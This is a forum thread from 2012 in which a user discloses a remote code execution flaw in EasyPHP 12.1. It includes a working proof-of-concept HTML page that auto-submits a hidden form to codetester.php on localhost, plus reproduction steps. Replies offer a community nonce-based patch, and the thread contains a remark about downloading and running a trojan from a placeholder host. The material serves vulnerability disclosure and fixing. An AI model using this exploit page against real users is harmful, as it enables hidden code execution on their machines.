follow us on google+ follow us feedburner

FORUM
We will close this forum soon. Please, now use Stack Overflow. Don't forget to add the tag "easyphp" to your post.

You can follow your activity on Stack Overflow with the Stack Exchange Android App. An iPhone version is coming...

One more thing. EasyPHP is on GitHub. You will find the repositories at this address : https://github.com/easyphp. If you want to report a bug, please use the GitHub issue management system of each repository.

12.1 security vulnerability, remote execution of php/js, full compromise of your PC!



Posted by: o2326570
October 23, 2012 02:17PM
Copy below code as "whatever.html" (replace "hxxp" with "http") to some remote server and browse the page with your browser while EasyPHP is running locally.

The page will execute php and javascript on your local server.

With this your PC can be fully compromised, endless possibilites.

Quick fix: Rename or delete ..\EasyPHP-12.1\home\codetester.php

Real fix: Add a nonce[1] to codetester.php or only allow from local host.

[1] [en.wikipedia.org]

[2] whatever.html:
<html>
<head>
<title>EasyPHP 12.1 remote access</title>
</head>
<body onload="window.document.forms[0].submit();">
Some innocent page...
<form action="hxxp://127.0.0.1/home/codetester.php" method="post" target="easyphp" style="display:none;">
<textarea name="sourcecode">
<?php
phpinfo();
echo '<scr'.'ipt type="text/javascript">alert("pwned, php executed on your EasyPHP server")<'.'/scr'.'ipt>';
?>
</textarea>
<input type="hidden" name="to" value="interpretcode">
<input type="submit" value="pwn">
</form>
<iframe name="easyphp" src="about:blank" style="display:none;"></iframe>
</body>
</html>
Options: ReplyQuote
Posted by: _Thierry_
October 24, 2012 01:46PM
No remote execution, Apache is listenning only on localhost.
Options: ReplyQuote
Posted by: o2326570
October 24, 2012 02:21PM
Obviously you did not understand or try the supplied PoC code "whatever.html"

The page "whatever.html" executes php code on your localhost.

If EasyPHP 12.1 is running on your PC and you visit a page like "whatever.html" on some server in internet with your browser, you are pwned.
Options: ReplyQuote
Posted by: _Thierry_
October 25, 2012 12:43PM
Ok, looks serious even I can't reproduce with my remote server and / or my browser. Please send me an email for further messages.

thierry
at
easyphp
dot
org
Options: ReplyQuote
Posted by: o2326570
October 25, 2012 04:35PM
Works everywhere:

1. Copy above html (replace "hxxp" with "http") to file "whatever.html"
2. Upload to example.com/whatever.html
3. Start EasyPHP 12.1
4. Start your browser (Tested: Firefox latest, Chrome latest, IE7 on Windows XP)
5. Make sure that JavaScript is enabled in browser
6. Open example.com/whatever.html in browser
7. A popup appears: "pwned, php executed on your EasyPHP server"
Options: ReplyQuote
Posted by: o2326570
October 30, 2012 06:13PM
When will you release a fix?

Will publish the bug on Full Disclosure Mailing List on 01. Nov. 2012
Options: ReplyQuote
Posted by: Russell
November 09, 2012 09:46PM
If anyone's concerned by this and wants a quick fix (without deleting the content of codetester.php), I've knocked up what I think should do the job until the EasyPHP team release a fix:

In codetester.php, change the first block of php to be:

include("i18n.inc.php");
include("functions.inc.php");
// Mod - lockdown the code tester to prevent remote exploits
session_start();

if (isset($_POST['to']) AND $_POST['to'] == "interpretcode") {
file_put_contents('codesource.php',
verify_nonce() ? $_POST['sourcecode'] : 'Detected an invalid submit, maybe an exploit attempt.');
}


Then further down in the file, find the line:

<input type="hidden" name="to" value="interpretcode" />

directly underneath it add the following line:

<input type="hidden" name="nonce" value="<?php echo get_nonce(); ?>" />



In index.php, we need to add the hidden input element for the nonce again, find the line:

<input type="hidden" name="to" value="interpretcode" />

directly beneath it add the line:

<input type="hidden" name="nonce" value="<?php echo get_nonce(); ?>" />



Finally in the functions.inc.php

Add the following function to the bottom of the php block (make sure its after the final "}" but before the "?>"):

//Mod - lockdown the code tester to prevent remote exploits
function get_nonce() {
$nonce = isset($_SESSION['nonce'])?$_SESSION['nonce']: hash('sha512', get_random_string());
$_SESSION['nonce'] = $nonce;
return $nonce;
}
function remove_nonce() {
unset($_SESSION['nonce']); //Remove the nonce from being used again!
}
function verify_nonce() {
$nonce = get_nonce(); // Fetch the nonce from the last request
remove_nonce(); // clear it so it can't be used again now we have it locally
session_regenerate_id(true); // replace old session, stops session fixation
// only verify if nonce is sent and matches what is expected
return (isset($_POST['nonce']) AND $_POST['nonce'] == $nonce);
}
function get_random_string()
{
$random_string = array();
for($index=0; $index<32; $index++)
{
//ascii chars 32 - 126 are printable (127 is DEL)
$random_string[] = chr( mt_rand(32,126));
}
return implode($random_string);
}


Its not perfect but it does work and will stop o2326570 from creating a popup on your PC, naughty hacker! ;-)

PS - this site removed the indenting, sorry.
Options: ReplyQuote
Posted by: o2326570
November 10, 2012 11:54AM
Russell Wrote:
-------------------------------------------------------
> Its not perfect but it does work and will stop
> o2326570 from creating a popup on your PC, naughty
> hacker! ;-)

For interested readers, instead of creating a popup it would be actually very easy to just silently delete all your files in the "My Documents" folder or upload them to some remote folder or download and start some hxxp://example.com/trojan.exe or whatever...

Thanks for providing a fix, Russell, the authors of EasyPHP obviously don't care...
Options: ReplyQuote
Posted by: Russell
November 10, 2012 04:12PM
o2326570,

I didn't meant to suggest all you can do is make popups. You're completely right about the potential for exploits.

The little ascii wink face was a nod to you.

Everyone else,

Since the rain has spoiled my plans for the afternoon, I've hosted the mod on github for anyone who isn't confident making the mod manually: [github.com]

Backup your EasyPHP-12.1/home directory before copying these files over (just in case), then just pull/download from github and copy into the EasyPHP-12.1/home directory. For those without git, use the "ZIP" button near the top of the page.

Russell
Options: ReplyQuote
Posted by: hansfn
November 23, 2012 09:28AM
This is indeed very serious. I'm very surprised that the EasyPHP developers haven't fixed this and made a new release long time ago. Today it's one month since this thread was started.

I can of course reproduce the issue and I can verify that the nonce-implementation from Russel stops exploits - thx, Russel.

With the code already there, the only thing needed is to repackage the 12.1 release - nothing to wait for developers.
Options: ReplyQuote
Posted by: o2326570
November 30, 2012 11:58AM
Seems the developers just don't care.

Or maybe the developers don't know anything about security.

Conclusion in either case: Better think twice before using a software from developers like this. There are alternatives...
Options: ReplyQuote
Posted by: Thierry
November 30, 2012 08:20PM
And what do you care of when you publish (here) an exploit ?

Yes, we have responsibility, but no enough time to make a new release.
But you also probably knows "white hat" ethic:
- signal to publisher
- if no reply publish about the failure. But never an exploit code.

This failure will never used by real hackers because it's better to found something in Acrobat or other wildspread soft.

You're right, it's a failure. You're wrong, it's not so important and you don't follow rules.


So stop crying, kiddy.



Edited 1 time(s). Last edit at 11/30/2012 08:22PM by Thierry.
Options: ReplyQuote


Your Name: 
Your Email: 
Subject: 
Spam prevention:
Please, enter the code that you see below in the input field. This is for blocking bots that try to post this form automatically. If the code is hard to read, then just try to guess it right. If you enter the wrong code, a new image is created and you get another chance to enter it right.